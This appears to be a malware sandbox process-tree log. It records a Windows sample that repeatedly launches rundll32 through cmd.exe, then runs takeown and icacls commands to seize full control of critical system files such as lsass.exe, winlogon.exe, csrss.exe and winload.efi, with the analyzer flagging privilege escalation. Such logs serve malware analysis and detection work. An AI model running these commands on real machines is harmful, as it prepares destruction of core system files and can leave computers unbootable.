C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1932
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:960
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2092
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1456
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2536
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2268
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2192
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3044
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1888
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2152
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2740
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2604
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:748
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1092
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2120
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1624
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2772
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2500
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2964
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2720
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2796
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2824
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2832
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1876
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1904
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2184
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1280
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1936
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2868
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2300
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:268
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1328
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2256
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3024
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2364
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1312
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1264
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:568
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2876
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2172
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1544
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3028
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:924
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2752
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:736
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1144
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3044
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2872
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:904
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2640
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1912
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2628
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:108
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:776
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2860
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2960
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2184
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1936
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:336
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2244
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1940
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3024
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1804
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2136
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2276
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1948
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1520
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2188
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1644
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:384
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:764
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:2612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\smss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:2352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\csrss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵PID:400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:1228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:2620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\lsass.exe /grant "Admin:F"3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:1888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\services.exe /grant "Admin:F"3⤵PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:2800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant "Admin:F"3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:1740
-
